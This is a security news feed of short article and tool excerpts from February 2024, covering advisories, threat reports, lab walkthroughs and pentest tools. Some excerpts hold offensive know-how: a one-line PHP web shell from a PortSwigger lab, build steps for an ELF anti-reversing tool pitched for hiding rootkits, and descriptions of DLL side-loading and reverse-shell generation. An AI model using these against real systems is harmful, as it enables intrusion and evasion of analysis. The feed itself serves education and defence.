AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services. How does it work? AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains...
http://www.kitploit.com/2024/02/azsubenum-azure-service-subdomain.html

Portswigger — Path Traversal All Labs Walkthrough(Bug Bounty Prep)[by dollarboysushil]
Link to PortSwigger academy: https://portswigger.net/web-security/file-path-traversal. For any correction / query / suggestion, contact dollarboysushil on Instagram, Twitter (X), YouTube or LinkedIn. What is path traversal? Path traversal or directory traversal is a vulnerability which allows an attacker to read arbitrary files on the server which they should not have access to. Reading arbitrary files via path traversal: let's look at an example to understand how a path traversal attack occurs. https://insecure-website.com/loadImage?filename=64.png In the above URL the filename parameter is used to load the image file, 64.png in this case. If there is not any proper validation or...
https://infosecwriteups.com/portswigger-path-traversal-all-labs-walkthrough-bug-bounty-prep-by-dollarboysushil-85ab64d6106a?source=rss----7b722bfd1b8d---4

DLL Side Loading Technique #Threat Hunting & #Adversary Emulation
One of my favorite techniques, which every APT group uses in cyber attacks, involves DLL side-loading. Most commonly, we see APT groups using signed Microsoft executables to load malicious DLLs. From the attacker's point of view: the threat actor sends a zip file containing a malicious DLL and a Microsoft-signed executable. The threat actor tricks the user into executing the signed executable. When the executable is run, the malicious DLL is loaded, downloads the second stage payload, creates persistence, or establishes a reverse connection to the C2 server. In the example below, you can see a folder containing ‘WFS.exe' and a malicious DLL. ‘WFS.exe' is a Microsoft-signed executable. The DLL contains a simple C program, which is designed to pop up a message box saying ‘Success,'...
https://infosecwriteups.com/dll-side-loading-technique-threat-hunting-adversary-emulation-71d380c07f2c?source=rss----7b722bfd1b8d---4

Key Concepts in Secure Software Development: A Pentester's Perspective
Web, mobile, and desktop applications are crucial in today's tech world. Most software developers overlook the concept of ‘security' while developing these applications. In this article, I will address some challenges I have encountered both in software development and penetration testing. Purpose of Software: regardless of size, every piece of software begins with an idea before coming into existence. Each piece of software has a purpose it serves in the background, and there are features it must have to fulfill that purpose. For instance, in a banking system, the purpose is to organize money transfers, provide information about budgets, etc. The situation is no different for small-scale applications. For example, the purpose of a simple note-taking app is to create a product where users can store and organize...
https://infosecwriteups.com/key-concepts-in-secure-software-development-a-pentesters-perspective-c117474fa33e?source=rss----7b722bfd1b8d---4

Harnessing Microsoft Copilot as a Cybersecurity Advisor
Microsoft Copilot, an AI-powered assistant integrated into Windows 11 and various Microsoft applications, is poised to revolutionize the role of cybersecurity advisors. Let's dive into how cybersecurity professionals can leverage Microsoft Copilot to enhance their advisory capabilities and bolster security practices. Understanding Microsoft Copilot: Microsoft Copilot is an AI assistant designed to assist users with various tasks, including finding information, creating content, and learning new skills. Integrated seamlessly into Windows 11 and Microsoft applications such as Word, Excel, PowerPoint, and Teams, Copilot serves as an everyday companion for users, offering assistance through conversational interfaces. Utilizing Copilot in Cybersecurity Advisory Roles: cybersecurity advisors play a...
https://infosecwriteups.com/harnessing-microsoft-copilot-as-a-cybersecurity-advisor-518c46f697b3?source=rss----7b722bfd1b8d---4

PortSwigger — LAB-5 Web shell upload via obfuscated file extension (Bug Bounty Prep)[by…
Link to lab: https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-obfuscated-file-extension. For any correction / query / suggestion, contact dollarboysushil on Instagram, Twitter (X), YouTube or LinkedIn, or on Discord: https://discord.gg/5jpkdeV. Level: Intermediate. Highly recommended to solve the previous labs first. Log in with the given credentials. Our aim is to read the content of /home/carlos/secret, for which we will use this simple PHP code: <?php echo file_get_contents('/home/carlos/secret'); ?> This PHP code uses file_get_contents to read the content of the file located at /home/carlos/secret and then echoes the output. Before...
https://infosecwriteups.com/portswigger-lab-5-web-shell-upload-via-obfuscated-file-extension-bug-bounty-prep-by-5232dd3fb8fa?source=rss----7b722bfd1b8d---4

Amazon's Network Offers Potential For Disaster Response and Military Communications
Through its subsidiary Kuiper Systems, Amazon will start providing broadband internet service from orbit later this year, most likely around the holidays. The first satellites of the project were launched in October of last year, and it has been under development since 2019. The project, which aims to provide low-latency connections to billions of people without dependable internet access worldwide, is conceptually similar to the SpaceX Starlink constellation. But Kuiper is doing more than just providing low-Earth orbit with high-speed internet access. It is adding capabilities to its constellation of more than 3,200 satellites to fortify the project against cyberattacks, electronic jamming, and other dangers to U.S. space assets. The most notable aspect of this constellation is...
https://infosecwriteups.com/amazons-network-offers-potential-for-disaster-response-and-military-communications-b68a847a340c?source=rss----7b722bfd1b8d---4

The UI Slip I Hit 750$: UI Manipulation Leading to Unauthorized Permission Changes
Discover how a UI mistake allowed unauthorized permission changes in a private program and bypassed the membership requirements. Learn the steps to reproduce this security flaw and its potential impact on platform and user privacy. Understanding the Target: ExamFront (virtual name of a private program) stands out as a specialized space for managing deals, partnerships, and collaborations. This platform is designed to streamline the intricate processes involved in deal-making, offering a centralized hub for organizations to orchestrate their business agreements seamlessly. The Flow: typically, when a user is created in the organization, they are granted all the default permissions. To remove these permissions, the organization requires the user to obtain membership privileges. However, I have identified a...
https://infosecwriteups.com/the-ui-slip-i-hit-750-ui-manipulation-leading-to-unauthorized-permission-changes-d65621d8dd96?source=rss----7b722bfd1b8d---4

MrHandler - Linux Incident Response Reporting
MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents. INSTALLATION INSTRUCTIONS: $ pip3 install colorama $ pip3 install paramiko $ git clone https://github.com/emrekybs/BlueFish.git $ cd MrHandler...
http://www.kitploit.com/2024/02/mrhandler-linux-incident-response.html

From the SIEM to the Lake: Bridging the Gap for Splunk Customers Post-Acquisition
By Omer Singer, VP of Strategy, Anvilogic. The smoke has cleared on Cisco's largest acquisition ever: that of Splunk for billion in September. This acquisition has added a new […]
https://www.cyberdefensemagazine.com/from-the-siem-to-the-lake-bridging-the-gap-for-splunk-customers-post-acquisition/

Google Launches ‘AI Cyber Defense Initiative' At The Munich Security Conference
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the Cybercrime Magazine Interview Sausalito, Calif. – Feb. 17, 2024 Google’s ‘AI Cyber Defense Initiative,’ launched at the Munich Security Conference on Feb. 16, signals a belief that the company’s experience in […]
https://cybersecurityventures.com/google-launches-ai-cyber-defense-initiative-at-the-munich-security-conference/

Metasploit Weekly Wrap-Up 02/16/2024
Metasploit adds an SMB fetch payload and new Base64 command encoder.
https://blog.rapid7.com/2024/02/16/metasploit-weekly-wrap-up-02-16-2024/

Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2024-21410)
What is the Vulnerability? Microsoft disclosed a critical security flaw in Exchange Server. Tracked as CVE-2024-21410, the issue has been described as a privilege escalation vulnerability. This security flaw can let remote unauthenticated threat actors escalate privileges in NTLM relay attacks against vulnerable Exchange Servers. Microsoft reported that the flaw has been actively exploited in the wild. What is the Vendor Solution? Microsoft released a patch on Feb 13, 2024, as part of its Patch Tuesday updates. Please follow the link to learn more about mitigation steps. What FortiGuard Coverage is available? FortiGuard Labs has an Endpoint Vulnerability Signature in place for CVE-2024-21410 to detect any vulnerable systems and auto patch if enabled. FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/5382

Revolutionising identity services using AI
The ‘NCSC for Startups' alumnus giving identity verification the 'Trust Stamp'
https://www.ncsc.gov.uk/blog-post/revolutionising-identity-services-using-ai

Leadership Careers: Competition For Top Cybersecurity Talent Is Fierce
This week in cybersecurity from the editors at Cybercrime Magazine – Read the full story in the Dallas Business Journal Sausalito, Calif. – Feb. 16, 2024 The size and complexity of the cybercrime problem mean there are tremendous opportunities for professionals interested in developing leadership […]
https://cybersecurityventures.com/leadership-careers-competition-for-top-cybersecurity-talent-is-fierce/

Cyber-insurance and vulnerability scanning – Week in security with Tony Anscombe
Here's how the results of vulnerability scans factor into decisions on cyber-insurance, and how human intelligence comes into play in the assessment of such digital signals.
https://www.welivesecurity.com/en/videos/cyber-insurance-and-vulnerability-scanning-week-security-tony-anscombe/

ISC2 Collaborates with IBM to Launch Entry-Level Cybersecurity Certificate
ISC2 – the world's leading nonprofit member organization for cybersecurity professionals – announced a partnership with IBM (NYSE: IBM) to launch the IBM and ISC2 Cybersecurity Specialist Professional Certificate. The new entry-level program, available exclusively via the Coursera platform, is designed to prepare prospective cybersecurity professionals for a career in the field. By completing a joint 12-course series, […] The post ISC2 Collaborates with IBM to Launch Entry-Level Cybersecurity Certificate first appeared on IT Security Guru.
https://www.itsecurityguru.org/2024/02/16/isc2-collaborates-with-ibm-to-launch-entry-level-cybersecurity-certificate/?utm_source=rss&utm_medium=rss&utm_campaign=isc2-collaborates-with-ibm-to-launch-entry-level-cybersecurity-certificate

Meet This Year's Most Inspiring Women in Cyber Nominees: Part 2
The nominations for the Most Inspiring Women in Cyber awards are out! It's always wonderful to read about the incredible women in our industry, who are making fantastic contributions and paving the way for others. This year we had so many exceptional nominees. MIWIC24 is sponsored by ThinkCyber, BT and Plexal, in partnership with WiCyS […] The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 2 first appeared on IT Security Guru.
https://www.itsecurityguru.org/2024/02/16/meet-this-years-most-inspiring-women-in-cyber-nominees-part-2/?utm_source=rss&utm_medium=rss&utm_campaign=meet-this-years-most-inspiring-women-in-cyber-nominees-part-2

Meet This Year's Most Inspiring Women in Cyber Nominees: Part 3
The nominations for the Most Inspiring Women in Cyber awards are out! It's always wonderful to read about the incredible women in our industry, who are making fantastic contributions and paving the way for others. This year we had so many exceptional nominees. MIWIC24 is sponsored by ThinkCyber, BT and Plexal, in partnership with WiCyS […] The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 3 first appeared on IT Security Guru.
https://www.itsecurityguru.org/2024/02/16/meet-this-years-most-inspiring-women-in-cyber-nominees-part-3/?utm_source=rss&utm_medium=rss&utm_campaign=meet-this-years-most-inspiring-women-in-cyber-nominees-part-3

Meet This Year's Most Inspiring Women in Cyber Nominees: Part 1
The nominations for the Most Inspiring Women in Cyber awards are out! It's always wonderful to read about the incredible women in our industry, who are making fantastic contributions and paving the way for others. This year we had so many exceptional nominees. MIWIC24 is sponsored by ThinkCyber, BT and Plexal, in partnership with WiCyS […] The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 1 first appeared on IT Security Guru.
https://www.itsecurityguru.org/2024/02/16/meet-this-years-most-inspiring-women-in-cyber-nominees-part-1/?utm_source=rss&utm_medium=rss&utm_campaign=meet-this-years-most-inspiring-women-in-cyber-nominees-part-1

NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes
NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.
Install
git clone https://github.com/MatheuZSecurity/NullSection
cd NullSection
gcc nullsection.c -o nullsection
./nullsection
Advantage
When running nullsection on any ELF (it could be a .ko rootkit), if you then use Ghidra/IDA to parse the ELF's functions, nothing will appear: there are no functions to parse in the decompiler, for example. Even if you run readelf -S /path/to/elf, the following message will appear: "There are no sections in this file." Make good use of the tool!
Note
We are not responsible for any damage caused by this tool; use the tool intelligently and for educational purposes only.
Download NullSection
http://www.kitploit.com/2024/02/nullsection-anti-reversing-tool-that.html

Part 3: The Anatomy of Supply Chain Attacks: Non-Human Identities & TPRM Failure
Originally published by Astrix.Written by Alex Flores, Danielle Guetta, and Tal Skverer. “Identity is the new perimeter.” This catch phrase is present in almost every website of identity security vendors, and for a good reason. Human access, more commonly referred to as user access, is an established security program in most organizations – big or small. The realization that user identities and login credentials need to be vigorously protected with IAM policies and security tools like MFA or ...
https://cloudsecurityalliance.org/articles/part-3-the-anatomy-of-supply-chain-attacks-non-human-identities-tprm-failure

Other Practices Are Placing Greater Trust in AI... When Will Cybersecurity?
Originally published by Dazz.Written by Noah Simon, Head of Product Marketing, Dazz.In 2023, we saw AI adoption rates soar—particularly for large language learning models (LLMs). Many industries are now incorporating AI into common processes and are seeing positive results—and not just in cost savings from performing repeatable tasks that humans would. While there are still concerns about using AI to replace humans for critical decision-making, that barrier is starting to come down as well. A...
https://cloudsecurityalliance.org/articles/other-practices-are-placing-greater-trust-in-ai-when-will-cybersecurity

5 Takeaways from a CISO Focus Group: Strategies for Managing Security and Compliance in Today's Digital Business Landscape
Originally published by RegScale.Everyone recognizes that in today's rapidly evolving business landscape, security AND compliance have become central to the success and sustainability of organizations. In an effort to gain an understanding of the customers we serve, RegScale made the decision to host a CISO Focus Group in D.C. As technology advances and threats grow in sophistication, understanding the integral role of security, navigating risk and compliance complexities, adapting to new evi...
https://cloudsecurityalliance.org/articles/5-takeaways-from-a-ciso-focus-group-strategies-for-managing-security-and-compliance-in-today-s-digital-business-landscape

What's Required After My First SOC 2 Report?
Originally published by MJD. Written by Mike DeKock, CPA, CEO, MJD.
Q: What is required after my first SOC 2 report?
A: MJD Answer
You've completed your SOC 2 report. That first-time report can be a lot of work, and it's worth celebrating while you hang the new AICPA logo on the website. So what's next? If you have done it right, it's pretty simple because your controls have been baked into the way you do business, so you just need to follow the new expectations you have set for your organization....
https://cloudsecurityalliance.org/articles/what-s-required-after-my-first-soc-2-report

Trust Model: The First Step to Ensure Your IT Network
Originally published by Devoteam. What is Zero Trust? Zero Trust is a security approach that mandates verification, employs least privilege, and operates under the assumption of a breach for every access request to a private network, irrespective of its origin or destination. Its foundation rests on several principles to improve your security: Explicit Verification: All access attempts are authenticated and authorized based on a comprehensive set of data points, including user identity, locat...
https://cloudsecurityalliance.org/articles/trust-model-the-first-step-to-ensure-your-it-network

Build code security skills with the GitHub Secure Code Game
Learn to find and fix security issues while having fun with Secure Code Game, now with new challenges focusing on JavaScript, Python, Go, and GitHub Actions! The post Build code security skills with the GitHub Secure Code Game appeared first on The GitHub Blog.
https://github.blog/2024-02-15-build-code-security-skills-with-the-github-secure-code-game/

AI in the SOC: Enhancing Efficiency Without Replacing Human Expertise
Originally published by Abnormal Security. Written by Mick Leach. The quickened pace of AI development and the release of tools like ChatGPT mark a fundamental shift in the AI conversation—moving from “what could happen” to “what will happen.” One topic that gets a significant amount of attention is whether AI will start replacing humans in so-called “knowledge worker” jobs—those roles that require some specialized knowledge, whether an architect, pharmacist, engineer, or even a cybersecurity practi...
https://cloudsecurityalliance.org/articles/ai-in-the-soc-enhancing-efficiency-without-replacing-human-expertise

Data Governance in the Cloud
Written by Ashwin Chaudhary, CEO, Accedere. As all organizations are moving towards the digitization of data and cloud computing, it is important for all organizations to protect data and ensure data governance. New data security solutions are needed considering data digitization and cloud computing. According to Gartner, “By 2025, 80% of organizations seeking to scale digital business will fail because they do not take a modern approach to data and analytics governance”. What is data governance? “E...
https://cloudsecurityalliance.org/articles/data-governance-in-the-cloud

Zero Trust Messaging Needs a Reboot
Written by Daniel Ballmer, Senior Transformation Analyst, CXO REvolutionaries, Zscaler. It's 2024, and Zero Trust adoption across industries remains somewhere below 33%. For reference, de-perimeterization, a stepping-stone to Zero Trust, was first discussed on the Jericho Forums twenty years ago. By 2010, the term Zero Trust was a staple of cybersecurity conversations. Now, public and private organizations have widely embraced the idea of Zero Trust. National governments, often several years b...
https://cloudsecurityalliance.org/articles/zero-trust-messaging-needs-a-reboot

RCE to Sliver: IR Tales from the Field
Rapid7 Incident Response was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions.
https://blog.rapid7.com/2024/02/15/rce-to-sliver-ir-tales-from-the-field/

Protecting PBX from cyber attacks
Why small organisations need to manage their private branch exchange (PBX) telephone networks.
https://www.ncsc.gov.uk/blog-post/protecting-pbx-from-cyber-attacks

How an Improper Access Control Vulnerability Led to Account Theft in One Click
Let's look more closely at the improper access control vulnerability type — what it is, how it's used, and how to remediate it.
https://www.hackerone.com/vulnerability-management/improper-access-control-deep-dive

Securing Supply Chains with Open XDR
How Open XDR provides an effective and comprehensive means of combating threats – Aimei Wei, Chief Technical Officer, Stellar Cyber. San Jose, Calif. – Feb. 15, 2024. Cyberattacks are on the rise in every industry, but software companies and their clients remain especially vulnerable because The post Securing Supply Chains with Open XDR appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/securing-supply-chains-with-open-xdr/

What is AI, really? | Unlocked 403: A cybersecurity podcast
Artificial intelligence is on everybody's lips these days, but there are also many misconceptions about what AI actually is and isn't. We unpack AI's basics, applications and broader implications.
https://www.welivesecurity.com/en/videos/ai-unlocked-403-cybersecurity-podcast/

The Cyber Scheme launches training course for IoT/ICS security testers
The Cyber Scheme has announced availability of a new CSII Practitioner Training Course that has been developed as a comprehensive IoT/ICS hacking course. The aim of the course is to teach candidates all the skills they need to securely test and assess connected systems and devices in consumer, industrial, and critical infrastructure environments. It is […] The post The Cyber Scheme launches training course for IoT/ICS security testers first appeared on IT Security Guru.
https://www.itsecurityguru.org/2024/02/15/the-cyber-scheme-launches-training-course-for-iot-ics-security-testers/?utm_source=rss&utm_medium=rss&utm_campaign=the-cyber-scheme-launches-training-course-for-iot-ics-security-testers

Salt Security API Protection Platform Now Available for Purchase in the CrowdStrike Marketplace
Today, API security pros Salt Security have announced that the Salt Security API Protection Platform is now available for purchase in the CrowdStrike Marketplace. Salt Security integrates with the industry-leading CrowdStrike Falcon® XDR platform to provide customers with best-of-breed API runtime monitoring and AI-driven insights for a 360-degree view of API security risks for effective threat […] The post Salt Security API Protection Platform Now Available for Purchase in the CrowdStrike Marketplace first appeared on IT Security Guru.
https://www.itsecurityguru.org/2024/02/15/salt-security-api-protection-platform-now-available-for-purchase-in-the-crowdstrike-marketplace/?utm_source=rss&utm_medium=rss&utm_campaign=salt-security-api-protection-platform-now-available-for-purchase-in-the-crowdstrike-marketplace

‘GhostExodus' Tells Cybercrime Magazine: “Hacking Ruined My Life”
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the Full Cybercrime Magazine Interview. Sausalito, Calif. – Feb. 15, 2024. In 2011, Jesse William McGraw aka ‘GhostExodus’, the ex-chief of Electronik Tribulation Army (ETA), a hacking collective, received a nine-year prison term The post ‘GhostExodus’ Tells Cybercrime Magazine: “Hacking Ruined My Life” appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ghostexodus-tells-cybercrime-magazine-hacking-ruined-my-life/

Private Branch Exchange (PBX) best practice
Protecting your organisation's telephony systems from cyber attacks and telecoms fraud.
https://www.ncsc.gov.uk/guidance/private-branch-exchange-best-practice

WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications
WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.
Done
[x] Scan Static Files.
[ ] Scan Metadata Of Public Documents (pdf, doc, xls, ppt, docx, pptx, xlsx etc.)
[ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.
Installation
From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com
From Dockerfile
You can run this application in a container after building the Dockerfile.
docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o
From DockerHub
You can run this application in a container after pulling it from DockerHub.
docker pull...
http://www.kitploit.com/2024/02/web-wordlist-generator-creates-related.html

From the cyber proliferation threat all the way to Pall Mall
The first dedicated conference on this topic – and an insight into the NCSC assessment work behind it.
https://www.ncsc.gov.uk/blog-post/cyber-proliferation-threat-conference

From Security Evolution to Generative AI: A Q&A with an Industry Leader
Tim Chase, Field CISO at Lacework, recently sat down with Rahul Gupta, Head of Security and Governance, Risk, and Compliance (GRC) at Sigma Computing. The two discussed a wide range of topics, including Gupta's perspective on the evolving security industry, how to attract and retain talent, things to look for in a security solution, the impacts of generative AI in cybersecurity, and much more.
TIM: Tell me about your role as Head of Security and GRC at Sigma Computing.
RAHUL: In my role at Sigma...
https://cloudsecurityalliance.org/articles/from-security-evolution-to-generative-ai-a-q-a-with-an-industry-leader

Threat Brief: Attacks on Critical Infrastructure Attributed to Insidious Taurus (Volt Typhoon)
Insidious Taurus, aka Volt Typhoon, is a nation-state TA attributed to the People's Republic of China. We provide an overview of their current activity and mitigation recommendations. The post Threat Brief: Attacks on Critical Infrastructure Attributed to Insidious Taurus (Volt Typhoon) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/volt-typhoon-threat-brief/

The Latest Microsoft Midnight Blizzard Breach is a Wakeup Call for SaaS Security
Originally published by Valence. Microsoft recently published new guidance on the nation-state attack that they initially disclosed on January 19. According to Microsoft, the Russian state-sponsored threat actor Midnight Blizzard (also known as NOBELIUM or APT29) was able to leverage a test tenant account and a legacy OAuth application to gain access to corporate email accounts, including members of senior leadership, cybersecurity team, legal team, and others, and exfiltrated some emails and...
https://cloudsecurityalliance.org/articles/the-latest-microsoft-midnight-blizzard-breach-is-a-wakeup-call-for-saas-security

Addressing Microsoft Teams Phishing Threats
Originally published by Adaptive Shield. Written by Hananel Livneh. AT&T Cybersecurity recently discovered phishing attacks conducted over Microsoft Teams. During a group chat, threat actors distributed malicious attachments to employees, which led to the installation of DarkGate malware on the victims' systems. This attack shines a bright light on the ever-changing phishing surface as it expands from email to communication applications like Teams. This blog post will shed light on the atta...
https://cloudsecurityalliance.org/articles/addressing-microsoft-teams-phishing-threats

Bumblebee malware wakes from hibernation, forgets what year it is, attacks with macros

https://www.proofpoint.com/us/newsroom/news/bumblebee-malware-wakes-hibernation-forgets-what-year-it-attacks-macros

U.S. Internet Leaked Years of Internal, Customer Emails
The Minnesota-based Internet provider U.S. Internet Corp. has a business unit called Securence, which specializes in providing filtered, secure email services to businesses, educational institutions and government agencies worldwide. But until it was notified last week, U.S. Internet was publishing more than a decade's worth of its internal email -- and that of thousands of Securence clients -- in plain text out on the Internet and just a click away for anyone with a Web browser.
https://krebsonsecurity.com/2024/02/u-s-internet-leaked-years-of-internal-customer-emails/

Navigating Cyberattacks And The Power Of AI-Driven Cybersecurity Solutions
This week in cybersecurity from the editors at Cybercrime Magazine – Read the full story in PhillyVoice. Sausalito, Calif. – Feb. 14, 2024. Cybersecurity Ventures predicts that by 2025, cybercrime could cost the world a staggering .5 trillion annually, up from trillion in 2015. AI’s The post Navigating Cyberattacks And The Power Of AI-Driven Cybersecurity Solutions appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/navigating-cyberattacks-and-the-power-of-ai-driven-cybersecurity-solutions/

Audio deepfakes: Celebrity-endorsed giveaway scams and fraudulent investment opportunities flood social media platforms
Bitdefender Labs has been keeping up with the latest modus operandi of cybercrooks who adapt emerging technologies to siphon money from consumers. Artificial intelligence is just one of the many tools that help in the creation and successful dissemination of online schemes to extort money and sensitive information. This paper focuses on voice cloning (audio deepfakes) schemes and how they are proliferated via social media to trick unsuspecting victims. Before delving deeper into the main subj
https://www.bitdefender.com/blog/labs/audio-deepfakes-celebrity-endorsed-giveaway-scams-and-fraudulent-investment-opportunities-flood-social-media-platforms/

Paving a Path to Systems Administration: Naeem Jones' Journey with Rapid7
Prior to becoming a Systems Administrator at Rapid7, Naeem Jones entered his career in cybersecurity through the Hack.Diversity program. Hack.
https://blog.rapid7.com/2024/02/14/paving-a-path-to-systems-administration-naeem-jones-journey-with-rapid7/

A Complete Guide to Breach and Attack Simulation
In today’s ever-evolving digital landscape, safeguarding your organization’s cyber infrastructure is crucial. With countless security… A Complete Guide to Breach and Attack Simulation on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/14/a-complete-guide-to-breach-and-attack-simulation/

Static Application Security Testing
In cybersecurity, businesses are increasingly accepting the pivotal role of robust application security measures. A… Static Application Security Testing on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/14/static-application-security-testing/

NIST Celebrates National Entrepreneurship Week
What is National Entrepreneurship (NatlEshipWeek) Week? Celebrated February 10-17, 2024, “NatlEshipWeek is a congressionally chartered week dedicated to empowering entrepreneurship across the United States. The annual initiative was relaunched in 2017 as NatlEshipWeek to bring together a network of partners from Maui to Miami to educate, engage, and build equitable access to America's Entrepreneurship Ecosystem.” Follow along online with #NatlEshipWeek. You can learn more about the initiative here: https://www.natleshipweek.org/about. Supporting Entrepreneurship is at the Heart of NIST's
https://www.nist.gov/blogs/cybersecurity-insights/nist-celebrates-national-entrepreneurship-week

Staying ahead of threat actors in the age of AI
Microsoft, in collaboration with OpenAI, is publishing research on emerging threats in the age of AI, focusing on identified activity associated with known threat actors Forest Blizzard, Emerald Sleet, Crimson Sandstorm, and others. The observed activity includes prompt-injections, attempted misuse of large language models (LLM), and fraud. The post Staying ahead of threat actors in the age of AI appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/

Cyber Signals: Navigating cyberthreats and strengthening defenses in the era of AI
Today we released the sixth edition of Cyber Signals, spotlighting the remarkable interest and impact driven by AI on the cybersecurity landscape. This includes new, joint threat intelligence Microsoft is sharing with our OpenAI partners, detailing how we are protecting AI platforms from attempted abuse by threat actors. The post Cyber Signals: Navigating cyberthreats and strengthening defenses in the era of AI appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/14/cyber-signals-navigating-cyberthreats-and-strengthening-defenses-in-the-era-of-ai/

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers
Essential utilities for pentesters, bug-bounty hunters and security researchers. secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth). The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
Features
Generate a reverse shell command
Obtain proxy
Download & deploy common payloads
Obtain reverse shell listener command
Generate bash install script for common tools
Generate bash download script for Wordlists
Read common cheatsheets...
http://www.kitploit.com/2024/02/secbutler-perfect-butler-for-pentesters.html

Kimsuky Group's Spear Phishing Detected by AhnLab EDR (AppleSeed, AlphaSeed)
Kimsuky threat group, deemed to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014, and have expanded their attacks to other countries since 2017 [1]. The group has mainly been attacking the national defense, defense industry, media, government organizations, and academic areas to steal internal data and technologies from them [2] (This report supports Korean only for now.) The... The post Kimsuky Group’s Spear Phishing Detected by AhnLab EDR (AppleSeed, AlphaSeed) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61631/

Fat Patch Tuesday, February 2024 Edition
Microsoft Corp. today pushed software updates to plug more than 70 security holes in its Windows operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.
https://krebsonsecurity.com/2024/02/fat-patch-tuesday-february-2024-edition/

Patch Tuesday - February 2024
Windows SmartScreen & Internet Shortcut EitW. Office Protected Mode bypass. Exchange critical elevation of privilege.
https://blog.rapid7.com/2024/02/13/patch-tuesday-february-2024/

CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)
Rapid7 has identified an unauthenticated command injection vulnerability in the QNAP operating system known as QTS, a core part of the firmware for numerous QNAP entry- and mid-level Network Attached Storage (NAS) devices.
https://blog.rapid7.com/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/

AI and cyber security: what you need to know
Understanding the risks - and benefits - of using AI tools.
https://www.ncsc.gov.uk/guidance/ai-and-cyber-security-what-you-need-to-know

Data residency: What is it and why it is important?
Data residency is a hot topic, especially for cloud data. The reason is multi-faceted, but the focus has been driven by the General Data Protection Regulation (GDPR), which governs information privacy in the European Union and the European Economic Area. The GDPR defines the requirement that users’ personal data and privacy be adequately protected by […] The post Data residency: What is it and why it is important? appeared first on Security Intelligence.
https://securityintelligence.com/posts/data-residency-why-is-it-important/

GenAI-Based Application Security 101
Gain insights into GenAI applications and how they represent an innovative category of technology, leveraging Large Language Models (LLMs) at their core.
https://www.legitsecurity.com/blog/genai-based-application-security-101

1-15 December 2023 Cyber Attacks Timeline
In early December 2023, event recordings decreased significantly to 135, with ransomware dominating 35.5% of incidents. The period saw a notable data breach at ESO Solutions, affecting 2.7 million patients, and a .7 million crypto theft at OKX. Geopolitical tensions spurred active cyber espionage, with APT28 exploiting critical vulnerabilities. The author encourages timeline review and community risk awareness support.
https://www.hackmageddon.com/2024/02/13/1-15-december-2023-cyber-attacks-timeline/

Decrypted: Rhysida Ransomware
The team at Avast has developed a decryptor for the Rhysida ransomware and released it for public download. The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including IT (Information Technology) sector, healthcare, universities, and government organizations. The post Decrypted: Rhysida Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-rhysida-ransomware

New Vulnerability in QNAP QTS Firmware: CVE-2023-50358
New zero-day vulnerability CVE-2023-50358 affects QNAP Network Attached Storage (NAS) devices. Our analysis includes its impact determined by our product data. The post New Vulnerability in QNAP QTS Firmware: CVE-2023-50358 appeared first on Unit 42.
https://unit42.paloaltonetworks.com/qnap-qts-firmware-cve-2023-50358/

Deepfakes in the global election year of 2024: A weapon of mass deception?
As fabricated images, videos and audio clips of real people go mainstream, the prospect of a firehose of AI-powered disinformation is a cause for mounting concern
https://www.welivesecurity.com/en/cybersecurity/deepfakes-election-year-2024-weapon-mass-deception/

